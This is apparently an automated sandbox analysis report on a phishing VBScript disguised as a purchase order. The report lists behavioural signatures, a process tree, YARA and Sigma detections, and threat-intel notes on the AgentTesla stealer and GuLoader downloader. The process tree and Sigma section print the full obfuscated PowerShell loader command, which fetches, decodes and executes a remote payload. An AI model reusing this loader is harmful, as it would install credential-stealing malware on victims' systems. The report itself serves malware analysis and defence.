Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Texas_Tool_Purchase_Order#T18834-1.vbs

Overview

General Information

Sample name:Texas_Tool_Purchase_Order#T18834-1.vbs
Analysis ID:1430129
MD5:85bb05a80334099ded83e21dd686c567
SHA1:308f10b6208abf4a9c92736c80b6dcb01ca332d2
SHA256:46d29ed35c7ca72d44d99f3d12603cd11435b6388bf61cd9988e7d375ddbb7b5
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2464 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6188 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 344 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5704 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 320 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2423205589.0000000008930000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.2415922796.0000000005C82000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_3012.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x101dc:$b2: ::FromBase64String(
            • 0xd56e:$s1: -join
            • 0x6d1a:$s4: +=
            • 0x6ddc:$s4: +=
            • 0xb003:$s4: +=
            • 0xd120:$s4: +=
            • 0xd40a:$s4: +=
            • 0xd550:$s4: +=
            • 0xf79d:$s4: +=
            • 0xf81d:$s4: +=
            • 0xf8e3:$s4: +=
            • 0xf963:$s4: +=
            • 0xfb39:$s4: +=
            • 0xfbbd:$s4: +=
            • 0xdc86:$e4: Get-WmiObject
            • 0xde75:$e4: Get-Process
            • 0xdecd:$e4: Start-Process
            amsi32_344.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x1013c:$b2: ::FromBase64String(
            • 0xd56e:$s1: -join
            • 0x6d1a:$s4: +=
            • 0x6ddc:$s4: +=
            • 0xb003:$s4: +=
            • 0xd120:$s4: +=
            • 0xd40a:$s4: +=
            • 0xd550:$s4: +=
            • 0xf79d:$s4: +=
            • 0xf81d:$s4: +=
            • 0xf8e3:$s4: +=
            • 0xf963:$s4: +=
            • 0xfb39:$s4: +=
            • 0xfbbd:$s4: +=
            • 0xdc86:$e4: Get-WmiObject
            • 0xde75:$e4: Get-Process
            • 0xdecd:$e4: Start-Process
            • 0x17a35:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in 